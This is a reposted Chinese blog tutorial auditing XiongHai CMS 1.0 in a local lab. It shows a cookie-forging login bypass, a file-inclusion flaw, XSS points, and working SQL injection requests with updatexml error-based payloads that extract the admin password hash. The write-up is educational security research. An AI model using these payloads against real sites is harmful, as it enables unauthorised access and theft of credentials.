iis服务器助手广告广告
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >熊海cms1.0代码审计
  • 496
分享到

熊海cms1.0代码审计

phpweb安全数据库mysql 2023-09-05 18:09:31 496人浏览 安东尼
摘要

目录 一、环境搭建 二、代码审计 (1)后台存在登录绕过漏洞 (2)登录后台user处存在SQL注入  (3)前(后)台文件包含漏洞 (4)后台SQL注入 1、admin/files/editcolumn 2、admin/files/edi

目录

一、环境搭建

二、代码审计

(1)后台存在登录绕过漏洞

(2)登录后台user处存在SQL注入 

(3)前(后)台文件包含漏洞

(4)后台SQL注入

1、admin/files/editcolumn

2、admin/files/editlink.php

3、admin/files/editsoft.php与admin/files/editwz.php

4、and '1'='1闭合构造SQL注入

(5)前台xss漏洞

1、/files/contact.php

2、/files/content.php


这个应该是比较简单的PHP代码审计了,适合新手

一、环境搭建

cms下载地址:

https://down.chinaz.com/soft/36930.htm

然后phpstudy环境搭建,php版本要小于7,之后要自己新建一个数据库

访问

Http://localhost/xhcms1.0/install/index.php

二、代码审计

在cnvd里面看到有很多漏洞,一个个尝试吧

(1)后台存在登录绕过漏洞

提示我们可以通过伪造cookie绕过登录检测,代码位于inc\checklogin.php

如果cookie里面的user为空就转到登录页面,那我们可以给user赋值来绕过

直接访问admin/页面 

直接进入到了网站后台。

(2)登录后台user处存在sql注入 

代码位于admin\files\login.php 

Word=$_POST['password'];$checkbox=$_POST['checkbox'];if ($login<>""){$query = "SELECT * FROM manage WHERE user='$user'";$result = Mysql_query($query) or die('SQL语句有误:'.mysql_error());$users = mysql_fetch_array($result);if (!mysql_num_rows($result)) {  echo "";exit;}else{$passwords=$users['password'];//echo $passwords;if(md5($password)<>$passwords){echo "";exit;}//写入登录信息并记住30天if ($checkbox==1){setcookie('user',$user,time()+3600*24*30,'/');}else{setcookie('user',$user,0,'/');}echo "";exit;}exit;ob_end_flush();}?>

这里没有对user进行过滤,直接拼接到了SQL语句里面,所以我们可以构造一下报错注入

POST /xhcms1.0/admin/?r=login HTTP/1.1Host: 192.168.10.128Content-Length: 95Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://192.168.10.128Content-Type: application/x-www-fORM-urlencodedUser-Agent: Mozilla/5.0 (windows NT 10.0; Win64; x64) AppleWEBKit/537.36 (Khtml, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,**;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://192.168.10.128/xhcms1.0/admin/?r=loginAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeuser=admin'or updatexml(1,concat(0x7e,mid((select password from manage),2,33)),1)#&password=123&login=yes

md5解密

 

 可以得知admin密码为admin

(3)前(后)台文件包含漏洞

前台漏洞代码位于:index.php,后台漏洞代码位于:admin\index.php

get方式获取r,然后经过addslashes函数处理,之后判断,再然后拼接读取

如果php版本小于等于5.3.4可以使用%00截断实现任意文件读取,但如果高了就只能进行php文件读取

(4)后台SQL注入

1、admin/files/editcolumn

$id=$_GET['id'];$type=$_GET['type'];if ($type==1){$query = "SELECT * FROM nav WHERE id='$id'";$resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());$nav = mysql_fetch_array($resul);}

很明显的SQL注入漏洞

http://localhost/xhcms1.0/admin/index.php?r=editcolumn&type=1&id=1'%20or%20updatexml(1,concat(0x7e,database()),1)%23

2、admin/files/editlink.php

$id=$_GET['id'];$query = "SELECT * FROM link WHERE id='$id'";$resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());$link = mysql_fetch_array($resul);

几乎一模一样

3、admin/files/editsoft.php与admin/files/editwz.php

也是一样的

4、and '1'='1闭合构造SQL注入

POST /xhcms1.0/admin/index.php?r=editcolumn&type=1&id=1 HTTP/1.1Host: 192.168.10.128Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: user=adminConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 111save=1&name=a' or updatexml(1,concat(0x7e,version()),1) and '1'='1&keywords=b&description=c&xs=d&px=e&content=f

还有很多类似的,像manageinfo.php里面也有

(5)前台xss漏洞

1、/files/contact.php

/index.php?r=contact&page=
$page=addslashes($_GET['page']);if ($page<>""){if ($page<>1){$pages="第".$page."页 - ";}}
<?php echo $navs['name']?> - <?php echo $pages.$info['name']?>

没有过滤直接拼接

2、/files/content.php

差不多的,id

">

来源地址:https://blog.csdn.net/m0_60716947/article/details/128611888

--结束END--

本文标题: 熊海cms1.0代码审计

本文链接: https://www.lsjlt.com/news/395833.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • 熊海cms1.0代码审计
    目录 一、环境搭建 二、代码审计 (1)后台存在登录绕过漏洞 (2)登录后台user处存在SQL注入  (3)前(后)台文件包含漏洞 (4)后台SQL注入 1、admin/files/editcolumn 2、admin/files/edi...
    99+
    2023-09-05
    php web安全 数据库 mysql
  • 熊海CMS代码审计漏洞分析
    目录前言基本结构SQL注入漏洞第一处第二处第三处XSS漏洞第一处第二处CSRF漏洞第一处垂直越权第一处结语前言 熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站...
    99+
    2023-02-24
    熊海CMS代码审计 CMS代码审计 漏洞分析
  • 熊海CMS代码审计漏洞怎么解决
    这篇文章主要介绍了熊海CMS代码审计漏洞怎么解决的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇熊海CMS代码审计漏洞怎么解决文章都会有所收获,下面我们一起来看看吧。基本结构这里我选择使用小皮面板搭建在了本地,以...
    99+
    2023-07-05
  • 代码审计-8 ThinkPHP框架代码审计 2
    文章目录 熟悉网站结构确定网站的路由1.通过分析url直接得出路由2.查看app/route.php 了解参数过滤情况SQL注入举例任意文件下载与删除任意文件下载代码分析任意...
    99+
    2023-09-10
    php apache 服务器
  • php代码审计
    🌕写在前面 🍊博客主页:Scorpio_m7,github🎉欢迎关注🔎点赞👍收藏⭐️留言📝...
    99+
    2023-09-01
    php 开发语言
  • ctfshow代码审计篇
    文章目录 web301-SQL注入web302- sql写shellweb303- insertweb304- 报错注入web305- 反序列化蚁剑连接数据库web306- 反序列化web30...
    99+
    2023-09-07
    php 数据库 开发语言
  • PHP代码审计(全)
    前言 官方文档:php.net php官方文档是非常详情,好用的,在遇到不清楚作用的函数时可以进行查询 白盒测试做代码审计最主要的知识是要去了解一个漏洞应该有哪些防御方式,因为大部分的漏洞都是因为修...
    99+
    2023-08-31
    php 开发语言 安全 代码复审 web安全
  • 梦想cms1.4代码审计
    目录 一、环境搭建 二、代码审计 1、后台漏洞  (1)BookAction.class.php (2)BackdbAction.class.php任意文件删除 (3)file.class.php任意文件读(写)漏洞 2、前台漏洞 (1)T...
    99+
    2023-09-01
    数据库 安全 web安全 php
  • Seay代码审计工具
    一、简介 Seay是基于C#语言开发的一款针对PHP代码安全性审计的系统,主要运行于Windows系统上。 这款软件能够发现SQL注入、代码执行、命令执行、文件包含、文件上传、绕过转义防护、拒绝服务、XSS跨站、信息泄露、任意URL跳转...
    99+
    2023-09-01
    php 代码审计 Powered by 金山文档
  • PHP中的代码审计
    随着网络技术的不断发展,各种应用程序逐渐成为生活中不可缺少的一部分。而PHP作为一种广泛应用于Web开发的编程语言,在众多应用程序中也扮演着重要的角色。然而,对于PHP代码的安全性,经常被忽视和忽略。对于黑客和攻击者来说,PHP应用程序成为...
    99+
    2023-05-24
    PHP 代码审计 安全漏洞
  • VauditDemo靶场代码审计
    靶场搭建 将下载好的VAuditDemo_Debug目录复制到phpstudy的www目录下,然后将其文件名字修改成VAuditDemo,当然你也可以修改成其他的 运行phpstudy并且访问in...
    99+
    2023-09-06
    php 网络安全 web安全 网络攻击模型
  • “快看”cms代码审计
    零基础学网络安全配套资料点击领取 环境安装 github源码地址:https://github.com/erichuang2015/kkcms 使用phpstudy 5.6.27+mysql5.5.5...
    99+
    2023-09-20
    php web安全 网络安全 渗透测试 安全
  • python 安全编码&代码审计
    现在一般的web开发框架安全已经做的挺好的了,比如大家常用的django,但是一些不规范的开发方式还是会导致一些常用的安全问题,下面就针对这些常用问题做一些总结。代码审计准备部分见《php代码审计》,这篇文档主要讲述各种常用错误场景,基本上...
    99+
    2023-01-31
    代码 python
  • 代码审计-2 SQL注入
    代码审计之SQL注入审计流程 ThinkPHP框架ThinkPHP的路由 PbootCMSPbootCMS留言处存在SQL注入代码分析 ThinkPHP框架 ThinkPH...
    99+
    2023-08-31
    php 安全
  • 我在 bilibili 学代码审计
         前几天在 B 站上看到一节录播课,感觉学习到了很多东西,反复观看仍不过瘾,所以决定写下这篇文章以做笔记。 漏洞简介   漏洞起源于前段时间比较火的小皮 1-click 漏洞,用户名登录处缺少过滤,导致可以直接构造恶意 payl...
    99+
    2023-09-07
    linux php 运维 服务器 开发语言
  • PHP函数的代码审计
    PHP函数是一种重要的编程语言特性,它可以帮助程序员大大提高编程效率和程序的可维护性。但是,在使用PHP函数的过程中,我们也需要对它们进行代码审计,以确保程序的安全性和可靠性。本文将从以下几个方面介绍PHP函数的代码审计:一、PHP函数的基...
    99+
    2023-05-18
    代码审计 PHP函数 函数审计
  • PHP代码审计-sql注入
    文章目录 前言sql注入字符型注入魔术引号编码注入base64编码url编码宽字节注入 过滤方法代码审计实战 前言 最近想学代码审计了,但是我本身的代码水平不高,学的比较基础,适...
    99+
    2023-09-17
    1024程序员节
  • 常见代码审计工具,代码审计为什么不能只用工具?
    代码审计是一种发现程序漏洞,安全分析为目标的程序源码分析方式。今天主要分享的是几款常用的代码审计工具,以及代码审计工具有哪些优缺点? 代码审计工具 seay代码审计工具,是一款开源的利用C#开发的一款...
    99+
    2023-09-06
    php 开发语言
  • 【代码审计-PHP】审计方法、敏感函数、功能点
      前言: 介绍:  博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocu...
    99+
    2023-09-05
    php
  • 怎样学习PHP代码审计
    怎样学习PHP代码审计,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。以Emlog 6.0  beta版本为引,一篇关于PHP语言CMS的代码审计文章,...
    99+
    2023-06-17
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作